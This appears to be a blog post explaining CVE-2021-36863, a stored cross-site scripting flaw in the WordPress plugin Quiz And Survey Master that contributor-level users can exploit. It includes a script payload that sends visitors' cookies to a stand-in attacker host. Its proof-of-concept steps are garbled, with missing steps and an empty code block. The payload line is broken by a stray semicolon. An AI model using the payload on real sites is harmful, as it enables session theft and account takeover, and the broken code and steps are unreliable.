CVE-2021-36863 - How Quiz And Survey Master Plugin’s XSS Vulnerability (contributor+) Put WordPress Sites at Risk

In 2021, a serious security issue — CVE-2021-36863 — was found in the popular WordPress plugin “Quiz And Survey Master” (QSM), maintained by ExpressTech. This flaw could let a logged-in user with at least “contributor” rights inject malicious JavaScript into the site, affecting visitors and site owners alike.

This post explains what happened, how it works, shows code snippets for understanding (and even exploiting responsibly), and gives resources for more info.

Fixed in version: 7.3.5

With this bug, any WordPress user allowed to create quizzes (even a “contributor”) could inject JavaScript in quiz data. The code would then execute when admins or visitors viewed the affected quiz. This could steal session cookies, take over accounts, or deface your site.

How the Vulnerability Works

QSM lets users create and edit quizzes from the WordPress admin interface. In vulnerable versions, some quiz fields (like “Contact Field”) do not sanitize user input before saving to the database and later outputting it on front-end and admin pages.

So, an attacker with contributor access could input something like

<script>alert('XSS by Contributor');</script>

If an admin later views the quiz or survey with this field, the browser runs the script. The attacker could replace the alert with something more dangerous, like stealing cookies.

Proof-of-Concept Exploit

Disclaimer: *The following is for educational and testing purposes ONLY. Do not use this on sites you don’t own or have explicit permission to test.*

Log in as a user with contributor role or higher.

2. Go to “Quizzes/Surveys” → Add New or Edit an existing quiz.

`html

`

5. Save/Publish the quiz.

When someone views the Quiz on the site — or even another admin editing it inside WordPress — the code runs!

Screenshot mockup

*(Not included here, but imagine a QSM admin page where in place of a field label you get a popup showing “QSM XSS!”)*

Exploit Code Snippet (for test environments)

Here’s some sample JavaScript you could use as a payload to demonstrate cookie theft (again, JUST FOR TESTING ON YOUR OWN SITES):

<script>
fetch('https://attacker.example.com/steal?cookie='; + document.cookie);
</script>

This would send the cookie of anyone viewing the quiz to the attacker’s server.

Real-World Impact

1. Account Hijacking: If an admin gets their session cookie stolen, the attacker can access the backend.
2. Malware Spread: Injected scripts could exploit site visitors, showing fake login forms, redirecting to phishing, or loading malware.

Reputation Damage: Search engines or browsers may block your site for malicious content.

4. Persistence: Even if the attacker’s account is removed, injected scripts remain until the quiz content is cleaned up.

References

- WPScan Vulnerability Entry
- NVD National Vulnerability Database
- Wordfence Blog - QSM Stored XSS
- Official QSM Changelog

Conclusion

CVE-2021-36863 is a good example of why *every* data input field in WordPress needs escaping and sanitization — and why privilege boundaries matter. Even a trusted user with “contributor” rights can be the source of a big problem.

If you run Quiz And Survey Master, check your version, update ASAP, and clean up vulnerable fields! For more details, always refer to the official sources and keep your plugins up-to-date.

---

Timeline

Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:45:00 UTC